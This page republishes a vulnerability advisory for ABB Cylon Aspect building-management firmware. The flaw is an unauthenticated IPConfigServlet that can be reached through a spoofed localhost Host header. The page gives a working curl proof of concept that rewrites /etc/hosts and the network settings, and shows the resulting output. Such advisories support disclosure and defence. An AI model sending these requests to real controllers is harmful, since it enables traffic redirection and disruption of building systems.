ABB Cylon Aspect 3.08.03 (MIX->IPConfigServlet) Network Manipulation

May 23, 2025 invoker category_exploit

Exploit Details

Basic Information

Exploit Title ABB Cylon Aspect 3.08.03 (MIX->IPConfigServlet) Network Manipulation
Exploit ID ZSL-2025-5944
Type zeroscience
Published 2025-05-22T00:00:00
Modified 2025-05-22T00:00:00

CVSS Information

CVSS Score 0.0
Severity NONE
Vector NONE

CVE Information

Exploit Description

Title: ABB Cylon Aspect 3.08.03 (MIX->IPConfigServlet) Network Manipulation Advisory ID: ZSL-2025-5944 Type: Local/Remote Impact: Security…

Exploit Code

ABB Cylon Aspect 3.08.03 (MIX->IPConfigServlet) Network Manipulation

Vendor: ABB Ltd.

Product web page: https://www.global.abb

Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio

Firmware: <=3.08.03

Summary: ASPECT is an award-winning scalable building energy management

and control solution designed to allow users seamless access to their

building data through standard building protocols including smart devices.

Desc: ABB Cylon Aspect MIX’s IPConfigServlet allows unauthenticated network

config changes via the Host: 127.0.0.1 bypass, writing to /etc/hosts and

config files. Attackers can redirect traffic (e.g. localhost to 1.2.3.4)

or disrupt connectivity, amplifying impact with network restarts.

Tested on: GNU/Linux 3.15.10 (armv7l)

GNU/Linux 3.10.0 (x86_64)

GNU/Linux 2.6.32 (x86_64)

Intel(R) Atom(TM) Processor E3930 @ 1.30GHz

Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz

PHP/7.3.11

PHP/5.6.30

PHP/5.4.16

PHP/4.4.8

PHP/5.3.3

AspectFT Automation Application Server

lighttpd/1.4.32

lighttpd/1.4.18

Apache/2.2.15 (CentOS)

OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)

OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

ErgoTech MIX Deployment Server 2.0.0

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic

@zeroscience

Advisory ID: ZSL-2025-5944

Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5944.php

21.04.2024

$ cat project

P R O J E C T

.|

| |

|’| ._____

___ | | |. |’ .—“|

_ .-‘ ‘-. | | .–‘| || | _| |

.-‘| _.| | || ‘-__ | | | || |

|’ | |. | || | | | | || |

____| ‘-‘ ‘ “” ‘-‘ ‘-.’ ‘` |____

░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░

░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░

░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░

$ curl http://192.168.73.31:7226/servlets/IPConfigServlet \

> -H “Host: localhost” \

> -d “config_change=1&ip=192.168.1.100&netmask=255.255.255.0&gateway=192.168.1.1&host0=segfault.mk&ip0=192.168.73.31”

$ cat /etc/hosts

127.0.0.1 localhost localhost.localdomain

192.168.1.100 mix mix.localhost.localdomain

192.168.73.31 segfault.mk

View Full Exploit Details

💭 Join the Security Discussion

🔒 Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.